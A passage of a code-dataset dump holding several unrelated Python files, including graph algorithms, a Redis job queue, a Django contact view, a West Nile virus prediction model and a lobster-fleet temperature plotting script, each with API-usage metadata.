{"api_name": "pdart.xml.templates.NodeBuilder", "line_number": 275, "usage_type": "name"}, {"api_name": "pdart.labels.target_identification.create_target_identification_nodes", "line_number": 276, "usage_type": "call"}, {"api_name": "pdart.labels.hst_parameters.get_instrument_id", "line_number": 281, "usage_type": "call"}, {"api_name": "pdart.labels.hst_parameters.get_detector_ids", "line_number": 282, "usage_type": "call"}, {"api_name": "pdart.labels.hst_parameters.get_filter_name", "line_number": 283, "usage_type": "call"}, {"api_name": "wavelength_ranges.wavelength_ranges", "line_number": 284, "usage_type": "call"}, {"api_name": "pdart.labels.hst_parameters.get_channel_id", "line_number": 288, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_titles_format", "line_number": 290, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_processing_level", "line_number": 312, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 313, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 313, "usage_type": "name"}, {"api_name": "pdart.labels.utils.lidvid_to_lid", "line_number": 321, "usage_type": "call"}, {"api_name": "pdart.labels.utils.lidvid_to_vid", "line_number": 322, "usage_type": "call"}, {"api_name": "pdart.labels.file_contents.get_file_contents", "line_number": 326, "usage_type": "call"}, {"api_name": "pdart.labels.investigation_area.investigation_area", "line_number": 329, "usage_type": "call"}, {"api_name": "pdart.labels.observing_system.observing_system", "line_number": 332, "usage_type": "call"}, {"api_name": "pdart.labels.time_coordinates.get_time_coordinates", "line_number": 333, "usage_type": "call"}, {"api_name": "pdart.xml.templates.combine_nodes_into_fragment", "line_number": 334, "usage_type": "call"}, {"api_name": "pdart.labels.primary_result_summary.primary_result_summary", "line_number": 338, "usage_type": "call"}, {"api_name": "pdart.labels.doc_reference_list.make_document_reference_list", "line_number": 339, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_collection_type", "line_number": 344, "usage_type": "call"}, {"api_name": "pdart.labels.fits_product_label_xml.make_data_label", "line_number": 346, "usage_type": "call"}, {"api_name": "pdart.labels.fits_product_label_xml.make_misc_label", "line_number": 348, "usage_type": "call"}, {"api_name": "pdart.labels.label_error.LabelError", "line_number": 356, "usage_type": "call"}, {"api_name": "pdart.xml.pretty.pretty_and_verify", "line_number": 360, "usage_type": "call"}]} +{"seq_id": "74919621", "text": "from src.GraphAlgoInterface import GraphAlgoInterface\nfrom DiGraph import DiGraph\nfrom GraphInterface import GraphInterface\nimport json\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport os\nimport math\n\n\nclass GraphAlgo(GraphAlgoInterface):\n def __init__(self, g: tuple = None):\n if g is None:\n self.g = DiGraph()\n else:\n self.g = g\n\n def get_graph(self) -> GraphInterface:\n return self.g\n\n def load_from_json(self, file_name: str):\n self.g=DiGraph()\n with open(file_name) as f:\n data = json.load(f)\n for n in data['Nodes']:\n self.g.add_node(n['id'])\n for e in data['Edges']:\n self.g.add_edge(e['src'], e['dest'], e['w'])\n\n def save_to_json(self, file_name: str):\n data = {\n \"Edges\": [],\n \"Nodes\": []\n }\n for n in self.g.get_all_v().keys():\n data[\"Nodes\"].append({\"id\": n})\n for n in self.g.get_all_v().keys():\n for n2, w in self.g.all_out_edges_of_node(n).items():\n data[\"Edges\"].append({\"src\": n, \"w\": w, \"dest\": n2})\n with open(file_name, 'w+') as f:\n json.dump(data, f)\n\n def shortest_path(self, id1: int, id2: int) -> (float, list):\n distancedict = {}\n q = []\n list = []\n q.append(id1)\n distancedict.update({id1: 0})\n while len(q) != 0:\n tmp = q.pop(0)\n for i in self.g.all_out_edges_of_node(tmp):\n if i not in distancedict:\n q.append(i)\n distancedict.update({i: self.g.all_out_edges_of_node(tmp)[i] + distancedict[tmp]})\n elif (self.g.all_out_edges_of_node(tmp)[i] + distancedict[tmp]) < distancedict[i]:\n q.append(i)\n distancedict.update({i: self.g.all_out_edges_of_node(tmp)[i] + distancedict[tmp]})\n if not id2 in distancedict:\n return math.inf, []\n tmp2 = id2\n\n while tmp2 != id1:\n for i in self.g.all_in_edges_of_node(tmp2):\n distancedict[i]\n if (self.g.all_out_edges_of_node(i)[tmp2] + distancedict[i] == distancedict[tmp2]):\n list.append(i)\n tmp2 = i\n break\n list.reverse()\n list.append(id2)\n return (distancedict[id2], list)\n\n def SCCUtil(self, u):\n next = 0\n nextgroup = 0\n index = [None] * self.g.v_size()\n lowlink = [None] * self.g.v_size()\n onstack = [False] * self.g.v_size()\n stack = []\n groups = []\n groupid = {}\n work = [(u, 0)]\n while work:\n v, i = work[-1]\n del work[-1]\n if i == 0:\n index[v] = next\n lowlink[v] = next\n next += 1\n stack.append(v)\n onstack[v] = True\n recurse = False\n for j in self.g.all_out_edges_of_node(v).keys():\n w = j\n if index[w] == None:\n work.append((v, j + 1))\n work.append((w, 0))\n recurse = True\n break\n elif onstack[w]:\n lowlink[v] = min(lowlink[v], index[w])\n if recurse: continue\n if index[v] == lowlink[v]:\n com = []\n while True:\n w = stack[-1]\n del stack[-1]\n onstack[w] = False\n com.append(w)\n groupid[w] = nextgroup\n if w == v: break\n groups.append(com)\n nextgroup += 1\n if work:\n w = v\n v, _ = work[-1]\n lowlink[v] = min(lowlink[v], lowlink[w])\n return groups\n\n\n def connected_component(self, id1: int):\n for i in self.SCCUtil(id1):\n for j in i:\n if (j == id1):\n return i\n return list()\n\n def Diff(self,li1, li2):\n return (list(list(set(li1) - set(li2)) + list(set(li2) - set(li1))))\n def connected_components(self):\n check=list(self.g.get_all_v().keys())\n ans=list()\n for i in self.g.get_all_v().keys():\n obj=self.SCCUtil(i)\n for j in obj:\n if check.__contains__(j[0]):\n j.reverse()\n ans.append(j)\n check=self.Diff(check,j)\n\n if not self.g.get_all_v().keys():\n ans.append(list())\n return ans\n\n\n def plot_graph(self):\n for key, val in self.g.get_all_v().items():\n for node, _ in self.g.all_out_edges_of_node(key).items():\n x2, y2 = self.g.get_all_v()[node]\n x1, y1 = val\n plt.plot([x1, x2], [y1, y2], marker='o')\n plt.show()\n", "sub_path": "EX3/src/GraphAlgo.py", "file_name": "GraphAlgo.py", "file_ext": "py", "file_size_in_byte": 4946, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "src.GraphAlgoInterface.GraphAlgoInterface", "line_number": 11, "usage_type": "name"}, {"api_name": "DiGraph.DiGraph", "line_number": 14, "usage_type": "call"}, {"api_name": "GraphInterface.GraphInterface", "line_number": 18, "usage_type": "name"}, {"api_name": "DiGraph.DiGraph", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 41, "usage_type": "call"}, {"api_name": "math.inf", "line_number": 59, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}]} +{"seq_id": "586590461", "text": "#\n# Author: Vincenzo Musco (http://www.vmusco.com)\n\nimport hashlib\nimport time\nimport random\n\nfrom mlperf.tools.config import TEMPFOLDER\n\nfrom scipy.stats.mstats import gmean\nfrom numpy import array\n\ndef computeMD5ResultIdentity(labels):\n md5 = hashlib.md5()\n\n for label in labels:\n md5.update(label)\n\n return md5.hexdigest()\n\n\ndef dumpDataOnCleanCsv(dataLessTarget):\n tempFile = \"{}/{}_{}.csv\".format(TEMPFOLDER, int(time.time()), random.randint(1,10000))\n\n fp = open(tempFile, \"w\")\n fp.write(dataLessTarget.to_csv(index=False, header=False))\n fp.close()\n\n return tempFile\n\n\ndef gmeanFixed(alist):\n gmeanConverted = list(map(lambda x: x + 1.1, alist))\n ret = gmean(array(gmeanConverted)) - 1.1\n return float(ret)\n", "sub_path": "mlperf/clustering/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 754, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "hashlib.md5", "line_number": 14, "usage_type": "call"}, {"api_name": "mlperf.tools.config.TEMPFOLDER", "line_number": 23, "usage_type": "argument"}, {"api_name": "time.time", "line_number": 23, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 23, "usage_type": "call"}, {"api_name": "scipy.stats.mstats.gmean", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "123406843", "text": "import shutil\nimport pytest\nfrom pathlib import Path\n\nfrom databroker.v2 import temp\nfrom pkg_resources import resource_filename\nfrom xpdacq.ipysetup import (CalibPreprocessor, UserInterface,\n _set_calib_preprocessor)\nfrom xpdacq.simulators import PerkinElmerDetector, Stage\nfrom xpdsim import cs700, fb, ring_current, shctl1, xpd_pe1c\n\n_PONI_FILFE = Path(resource_filename(\"xpdacq\", \"tests/Ni_poni_file.poni\"))\n\n\n@pytest.mark.skip\ndef test_ipysetup(beamline_config_file):\n db = temp()\n ui = UserInterface(\n area_dets=[xpd_pe1c],\n det_zs=[None],\n shutter=shctl1,\n temp_controller=cs700,\n filter_bank=fb,\n ring_current=ring_current,\n db=db,\n blconfig_yaml=beamline_config_file,\n test=True\n )\n assert ui is not None\n\n\n@pytest.mark.skip\ndef test__set_calib_preprocessor(tmp_path: Path):\n det = PerkinElmerDetector(name=\"det\")\n det_z = Stage(name=\"det_stage\").z\n poni_file = tmp_path.joinpath(_PONI_FILFE.name)\n shutil.copy(_PONI_FILFE, poni_file)\n dct = {\n \"config_base\": str(poni_file.parent),\n \"calib_config_name\": poni_file.name\n }\n # case 1\n cpp1 = CalibPreprocessor(det)\n _set_calib_preprocessor(cpp1, dct, None)\n assert cpp1._cache\n first = next(iter(cpp1._cache.keys()))\n assert dict(first) == dict()\n # case 2\n cpp2 = CalibPreprocessor(det)\n _set_calib_preprocessor(cpp2, dct, det_z)\n assert cpp2._cache\n first = next(iter(cpp2._cache.keys()))\n assert dict(first) == {det_z.name: det_z.get()}\n", "sub_path": "xpdacq/tests/test_ipysetup.py", "file_name": "test_ipysetup.py", "file_ext": "py", "file_size_in_byte": 1569, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 12, "usage_type": "call"}, {"api_name": "pkg_resources.resource_filename", "line_number": 12, "usage_type": "call"}, {"api_name": "databroker.v2.temp", "line_number": 17, "usage_type": "call"}, {"api_name": "xpdacq.ipysetup.UserInterface", "line_number": 18, "usage_type": "call"}, {"api_name": "xpdsim.xpd_pe1c", "line_number": 19, "usage_type": "name"}, {"api_name": "xpdsim.shctl1", "line_number": 21, "usage_type": "name"}, {"api_name": "xpdsim.cs700", "line_number": 22, "usage_type": "name"}, {"api_name": "xpdsim.fb", "line_number": 23, "usage_type": "name"}, {"api_name": "xpdsim.ring_current", "line_number": 24, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 33, "usage_type": "name"}, {"api_name": "xpdacq.simulators.PerkinElmerDetector", "line_number": 34, "usage_type": "call"}, {"api_name": "xpdacq.simulators.Stage", "line_number": 35, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 37, "usage_type": "call"}, {"api_name": "xpdacq.ipysetup.CalibPreprocessor", "line_number": 43, "usage_type": "call"}, {"api_name": "xpdacq.ipysetup._set_calib_preprocessor", "line_number": 44, "usage_type": "call"}, {"api_name": "xpdacq.ipysetup.CalibPreprocessor", "line_number": 49, "usage_type": "call"}, {"api_name": "xpdacq.ipysetup._set_calib_preprocessor", "line_number": 50, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "307960278", "text": "# import the necessary packages\nimport redis\nfrom redis_collections import Dict\nfrom redis import StrictRedis\ncache = StrictRedis()\nfrom datetime import datetime\nimport json\njob = Dict()\nimport yaml\n\nif __name__ == \"__main__\":\n \n db = redis.Redis('localhost')\n \n #first pull the job queue history\n mluserJob = (db.hgetall(\"jobqueu2e\")) \n for userJob in mluserJob.items(): \n #loop through to groom job queue - either purge or process\n entry = {}\n id = int(userJob[0].decode(\"utf-8\"))\n print(str(id) + '....')\n entry = yaml.load(userJob[1])\n print(entry)\n \n try:\n if (entry['Done Date']):\n print (str(id) + ' already done')\n except: \n entry[\"status\"] = \"Done\"\n entry[\"Done Date\"] = str(datetime.now())\n print('Job Processed')\n job[id] = json.dumps(entry)\n print (job)\n db.hmset('jobqueu2e',job)\n\n", "sub_path": "pull_queue_process.py", "file_name": "pull_queue_process.py", "file_ext": "py", "file_size_in_byte": 985, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "redis.StrictRedis", "line_number": 5, "usage_type": "call"}, {"api_name": "redis_collections.Dict", "line_number": 8, "usage_type": "call"}, {"api_name": "redis.Redis", "line_number": 13, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "23195962", "text": "from builtins import object\nfrom pyspark.sql.functions import udf\n\nfrom bi.common.datafilterer import DataFrameFilterer\n\n\nclass DataFilterHelper(object):\n def __init__(self, data_frame, df_context):\n self._data_frame = data_frame\n self._df_context = df_context\n self._pandas_flag = self._df_context._pandas_flag\n\n def clean_data_frame(self):\n \"\"\"\n used to convert dimension columns to measures takes input from config (measure suggestions).\n \"\"\"\n try:\n func = udf(lambda x: utils.tryconvert(x), FloatType())\n self._data_frame = self._data_frame.select(*[func(c).alias(c) if c in self.measure_suggestions else c for c in self.columns])\n self._data_frame.schema.fields\n except:\n pass\n\n def set_params(self):\n self.subset_columns = self._df_context.get_column_subset()\n if not self.subset_columns==None:\n self._data_frame = self.subset_data_frame(self.subset_columns)\n\n self.measure_suggestions = self._df_context.get_measure_suggestions()\n\n if self.measure_suggestions != None:\n self.measure_suggestions = [m for m in self.measure_suggestions if m in self.subset_columns]\n if len(self.measure_suggestions)>0:\n self.clean_data_frame()\n\n self.df_filterer = DataFrameFilterer(self._data_frame, self._pandas_flag)\n self.dimension_filter = self._df_context.get_dimension_filters()\n if not self.dimension_filter==None:\n for colmn in list(self.dimension_filter.keys()):\n self.df_filterer.values_in(colmn, self.dimension_filter[colmn])\n self.measure_filter = self._df_context.get_measure_filters()\n if not self.measure_filter==None:\n for colmn in list(self.measure_filter.keys()):\n self.df_filterer.values_between(colmn, self.measure_filter[colmn][0],self.measure_filter[colmn][1],1,1)\n\n self._data_frame = self.df_filterer.get_filtered_data_frame()\n\n def get_data_frame(self):\n return self._data_frame\n\n def subset_data_frame(self, columns):\n return self._data_frame.select(*columns)\n", "sub_path": "bi/common/datafilterhelper.py", "file_name": "datafilterhelper.py", "file_ext": "py", "file_size_in_byte": 2178, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "builtins.object", "line_number": 7, "usage_type": "name"}, {"api_name": "pyspark.sql.functions.udf", "line_number": 18, "usage_type": "call"}, {"api_name": "bi.common.datafilterer.DataFrameFilterer", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "44571020", "text": "from django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.shortcuts import render\n\nfrom .forms import ContactForm\n\n# Create your views here.\n\n\ndef home(request):\n title = \"Contact G Fitness\"\n form = ContactForm(request.POST or None)\n confirm_message = None\n\n if form.is_valid():\n name = form.cleaned_data['name']\n sender = form.cleaned_data['email']\n received_message = form.cleaned_data['message']\n subject = 'Message from G Fitness Contact Form'\n sent_message = '{} {}'.format(received_message, name)\n to_us = [settings.EMAIL_HOST_USER]\n send_mail(subject, sent_message, sender,\n to_us, fail_silently=True)\n title = 'Thank you'\n confirm_message = \"\"\"\n Thank you for your message. We have received it, and we are reviewing it.\n \"\"\"\n form = None\n\n context = {\n 'title': title,\n 'form': form,\n 'confirm_message': confirm_message\n }\n return render(request, 'contact.html', context)\n", "sub_path": "contact/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1061, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "forms.ContactForm", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.settings.EMAIL_HOST_USER", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 21, "usage_type": "name"}, {"api_name": "django.core.mail.send_mail", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "624590245", "text": "\nimport pandas as pd\nimport numpy as np\nfrom sklearn import ensemble\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.feature_selection import SelectFromModel\nfrom datetime import datetime\nimport processor_weather\nimport processor_maindata\n\nIMPORTANCE_THRESHOLD = 0.01\n\ndef build_model(train,test,features,target,classifier_to_use,param_distributions,cv=None):\n \n '''\n build a model using RFC (default) or GBC\n - automated cross-validation search of hyperparameters\n - automated feature selection\n '''\n if cv == None:\n cv = 3\n\n if classifier_to_use=='GBC':\n classifier = ensemble.GradientBoostingClassifier()\n else:\n classifier = ensemble.RandomForestClassifier()\n \n # optimal hyperparameters (using GridSearchCV)\n myCV = GridSearchCV(classifier, param_distributions,\n scoring='roc_auc', n_jobs=-1, cv=cv, verbose=0)\n\n myCV.fit(train[features], y=train[target])\n\n clf = myCV.best_estimator_\n print (\"best params: \",myCV.best_params_)\n\n print (\"Feature Importance (all features): \")\n for feature, importance in sorted(zip(features,clf.feature_importances_), key=lambda x:x[1],reverse=True):\n print (feature, importance)\n \n # feature selection\n sfm = SelectFromModel(clf,threshold=IMPORTANCE_THRESHOLD)\n X_train_transform = sfm.fit_transform(train[features],train[target])\n X_test_transform = sfm.transform(test[features])\n\n clf.fit(X_train_transform,train[target])\n \n model_statistics(clf, X_train_transform, train[target], X_test_transform,test[target])\n\n \n return myCV.best_params_, clf, sfm\n\n\n\ndef model_statistics(model,X_train,y_train, X_val, y_val):\n '''\n report model performance\n '''\n predict_scores = model.predict_proba(X_train)\n print (\"train AUC: \", roc_auc_score(y_train, predict_scores[:,1]))\n \n predict_scores = model.predict_proba(X_val)\n print (\"test AUC: \", roc_auc_score(y_val, predict_scores[:,1]))\n return\n\n\n# Load dataset \ntrain_in = pd.read_csv('../input/train.csv')\ntest_in = pd.read_csv('../input/test.csv')\nweather_in = pd.read_csv('../input/weather.csv')\n#spray_in = pd.read_csv('../input/spray.csv')\nsample = pd.read_csv('../input/sampleSubmission.csv')\n\n# parameters\ntarget = 'WnvPresent'\nMIN_HIT = 30 # for random forest min_leaf_samples\n\n\n# encode categorical features\ntrain_cat, test_cat = processor_maindata.encode_categorical_features(train_in, test_in, 'Species')\ntrain_cat, test_cat = processor_maindata.encode_trap(train_cat, test_cat)\n\n# process weather data\nweather = processor_weather.transform_data(weather_in)\n\n\ntrain_in_transformed = processor_maindata.transform_data(train_cat, target=target)\ntrain_in_transformed = processor_maindata.merge_weather(train_in_transformed, weather)\n\ntest_transformed = processor_maindata.transform_data(test_cat)\ntest_transformed = processor_maindata.merge_weather(test_transformed, weather)\n\n# split provided train into training and out_of_time test sets\ntest_year = 2013\nmytrain = train_in_transformed[train_in_transformed['year']!=test_year]\nmytest = train_in_transformed[train_in_transformed['year']==test_year]\nprint ('my training, test sets:', len(mytrain), len(mytest))\n\n# prepare for training\nfeatures = processor_maindata.features + processor_weather.features \nprint('features',features)\nmin_samples_leaf = int(MIN_HIT / mytrain[target].mean())\nprint ('min_samples_leaf',min_samples_leaf)\n\n# random forest\n#param_distributions={'n_estimators':[500],\n# 'min_samples_leaf':[min_samples_leaf,int(1.5*min_samples_leaf)],\n# 'max_features':['sqrt','log2',None]\n# }\n#best_params, clf = build_model(mytrain,mytest,features,target,'RFC',param_distributions,5)\n\n# gradient boosting classifier\nparam_distributions={'n_estimators':[15,25,50],\n 'learning_rate':[0.1,0.125],\n 'min_samples_leaf':[int(0.5*min_samples_leaf), min_samples_leaf],\n 'subsample':[.4,.5,.6]\n }\nbest_params, clf, sfm = build_model(mytrain,mytest,features,target,'GBC',param_distributions,5)\n\n\n# retrain model with all training data\ntrain = train_in_transformed\nmin_samples_leaf = int(MIN_HIT / train_in_transformed[target].mean())\nprint ('min_samples_leaf',min_samples_leaf)\n\n#clf = ensemble.RandomForestClassifier(max_features=best_params['max_features'], \n# n_estimators=best_params['n_estimators'],\n# min_samples_leaf=best_params['min_samples_leaf']) )\nclf = ensemble.GradientBoostingClassifier(subsample=best_params['subsample'],\n n_estimators=best_params['n_estimators'],\n min_samples_leaf=min_samples_leaf,\n learning_rate=best_params['learning_rate'])\n\nX_train_transformed = sfm.transform(train[features])\nclf.fit(X_train_transformed,train[target])\n\npredict_scores = clf.predict_proba(X_train_transformed)\nprint (\"final train AUC: \", roc_auc_score(train[target], predict_scores[:,1]))\n\n# create predictions and submission file\ntest_transformed = processor_maindata.transform_data(test_cat)\ntest_transformed = processor_maindata.merge_weather(test_transformed, weather)\ntest = test_transformed\nX_test_transformed = sfm.transform(test[features])\n\npredictions = clf.predict_proba(X_test_transformed)[:,1]\nsample['WnvPresent'] = predictions\nsample.to_csv('predicted_proba.csv', index=False)\n\n\n\n\n", "sub_path": "model_weatherMTW_featureSelect.py", "file_name": "model_weatherMTW_featureSelect.py", "file_ext": "py", "file_size_in_byte": 5540, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 25, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 27, "usage_type": "name"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 64, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 73, "usage_type": "call"}, {"api_name": "processor_maindata.encode_categorical_features", "line_number": 81, "usage_type": "call"}, {"api_name": "processor_maindata.encode_trap", "line_number": 82, "usage_type": "call"}, {"api_name": "processor_weather.transform_data", "line_number": 85, "usage_type": "call"}, {"api_name": "processor_maindata.transform_data", "line_number": 88, "usage_type": "call"}, {"api_name": "processor_maindata.merge_weather", "line_number": 89, "usage_type": "call"}, {"api_name": "processor_maindata.transform_data", "line_number": 91, "usage_type": "call"}, {"api_name": "processor_maindata.merge_weather", "line_number": 92, "usage_type": "call"}, {"api_name": "processor_maindata.features", "line_number": 101, "usage_type": "attribute"}, {"api_name": "processor_weather.features", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 130, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 130, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 139, "usage_type": "call"}, {"api_name": "processor_maindata.transform_data", "line_number": 142, "usage_type": "call"}, {"api_name": "processor_maindata.merge_weather", "line_number": 143, "usage_type": "call"}]} +{"seq_id": "397612871", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mar 24,2021\r\nRoutine to plot CFRF temporal range of data per vessel\r\nNote: this is using raw data, not \"fixed\"\r\n@author: James.manning\r\n\"\"\"\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\nreadall=True# read from saved dataframe file called \"cfrf_all\" (if false read all the bi-annual files)\r\nfiles=['2014 to 2016','2016 to 2018','2018 to 2020','2020 to 1_21_2021']\r\n\r\nif readall==False: # need to read all the individual files and compile them\r\n for k in range(len(files)):\r\n infile='CFRF_LobsterCrabResearchFleet_TempData_'+files[k]+'.xlsx'\r\n print('reading '+infile)\r\n df1=pd.read_excel(infile)\r\n if k==0:\r\n df=df1\r\n else:\r\n df=pd.concat([df, pd.read_excel(infile)], axis=0)\r\n df.to_pickle('cfrf_all')\r\nelse:\r\n df=pd.read_pickle('cfrf_all') # reads one big file created \r\n print('assumes df is already loaded')\r\n\r\ndf['datet']=pd.to_datetime(df['when_sampled'])# converts string to datetime variable\r\ndf.set_index('datet') # makes datet the index of the matrix\r\n\r\n# Fix positions such as positive longitudes that should be negative\r\ndf['longitude']=abs(df['longitude'])*-1. # makes sure all are negative\r\nid=np.where(df['longitude'].values<-100.)[0]\r\nprint(str(df['when_sampled'].values[id[0]])+' had posiition in DDMM '+str(df['longitude'].values[id[0]])+' DDMM format (see vessel '+str(df['vessel_id'].values[id[0]])+')') \r\n#for k in list(id):\r\n# [df['latitude'][k],df['longitude'][k]]=dm2dd(df['latitude'].values[k],-1*df['longitude'].values[k])\r\n#df=df.drop(df.index[id],inplace=True) # gets rid of these \r\n\r\nfig, ax = plt.subplots()\r\nimport seaborn as sns\r\npalette = sns.color_palette(None, 26)\r\nplt.title('moored bottom temperature temporal coverage by vessel#')\r\nplt.suptitle('CFRF 2014-present', fontsize=20)\r\nvessel_list=np.unique(df['vessel_id'])\r\ny=0\r\nfor j in vessel_list:\r\n dfds=df[df['vessel_id']==j]\r\n #if j==999:\r\n # j=49\r\n print(' ')\r\n print(j)\r\n min=np.min(dfds['datet'].values)\r\n max=np.max(dfds['datet'].values)\r\n ax.plot([min,max],[y,y],color=palette[y],linestyle='-',linewidth=4)\r\n ax.scatter(dfds['datet'].values,[y]*len(dfds),color='k')\r\n ax.annotate(str(j), (min,y),color=palette[y],fontsize=12, xytext=(-17,-1.),fontweight='bold', textcoords='offset points')\r\n y=y+1\r\n \r\nplt.show()\r\nfig.savefig('plt_cfrf_temporal_coverage_all.png')", "sub_path": "cfrf/plt_cfrf_temporal_coverage.py", "file_name": "plt_cfrf_temporal_coverage.py", "file_ext": "py", "file_size_in_byte": 2450, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_excel", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "seaborn.color_palette", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "218869835", "text": "from os import listdir\nfrom PIL import Image\n\n\n\ndef pinjie():\n # 获取当前文件夹中所有JPG图像\n im_list = [Image.open('F:/picture/') for fn in listdir() if fn.endswith('.png')]\n img1 = Image.open('F:/picture/29.png')\n img2 = Image.open('F:/picture/33.png')\n im_list.append(img1)\n im_list.append(img2)\n # 图片转化为���同的尺寸\n ims = []\n for i in im_list:\n new_img = i.resize((1280, 1280), Image.BILINEAR)\n ims.append(new_img)\n\n # 单幅图像尺寸\n width, height = ims[0].size\n\n # 创建空白长图\n result = Image.new(ims[0].mode, (width, height * len(ims)))\n\n # 拼接图片\n for i, im in enumerate(ims):\n result.paste(im, box=(0, i * height))\n\n # 保存图片\n result.save('F:/picture/res1.jpg')\n\n\nif __name__ == '__main__':\n pinjie()", "sub_path": "slider/first1/图片.py", "file_name": "图片.py", "file_ext": "py", "file_size_in_byte": 829, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PIL.Image.open", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 8, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 10, "usage_type": "name"}, {"api_name": "PIL.Image.BILINEAR", "line_number": 16, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 16, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 23, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "310344465", "text": 